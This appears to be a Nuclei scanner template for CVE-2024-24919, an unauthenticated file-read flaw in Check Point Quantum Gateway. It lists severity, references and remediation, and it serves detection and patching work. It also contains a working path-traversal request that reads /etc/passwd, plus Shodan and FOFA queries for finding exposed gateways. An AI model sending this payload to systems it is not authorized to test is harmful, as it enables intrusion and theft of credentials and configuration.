id: CVE-2024-24919 info: name: Check Point Quantum Gateway - Information Disclosure author: johnk3r,s4e-io severity: high description: | Potentially allowing an attacker to read certain information on Check Point Security Gateways once connected to the internet and enabled with remote Access VPN or Mobile Access Software Blades. A Security fix that mitigates this vulnerability is available. impact: | Unauthenticated attackers can read arbitrary files on Check Point Security Gateways, potentially exposing sensitive configuration files and credentials. remediation: | Apply Check Point security fixes for CVE-2024-24919 as specified in SK182337. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 - https://s4e.io/tools/check-point-quantum-gateway-information-disclosure-cve-2024-24919 - https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html - https://censys.com/cve-2024-24919/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2024-24919 cwe-id: CWE-200 epss-score: 0.94342 epss-percentile: 0.99957 cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway shodan-query: - html:"Check Point SSL Network" - http.html:"check point ssl network" fofa-query: body="check point ssl network" tags: cve,cve2024,checkpoint,lfi,kev,vkev,vuln http: - raw: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip aCSHELL/../../../../../../../etc/passwd matchers-condition: and matchers: - type: regex part: body regex: - "root:.*" - "nobody:.*" condition: and - type: status status: - 200 # digest: 4a0a0047304502206e938d54f660967f31aa59d6fc335c05d8130453e30be5a16401f559d9f2153d022100a5b16f789da42c9943bb14bc36fa461c60327e7f50431626eea300ebba45eb6b:922c64590222798bb761d5b6d8e72950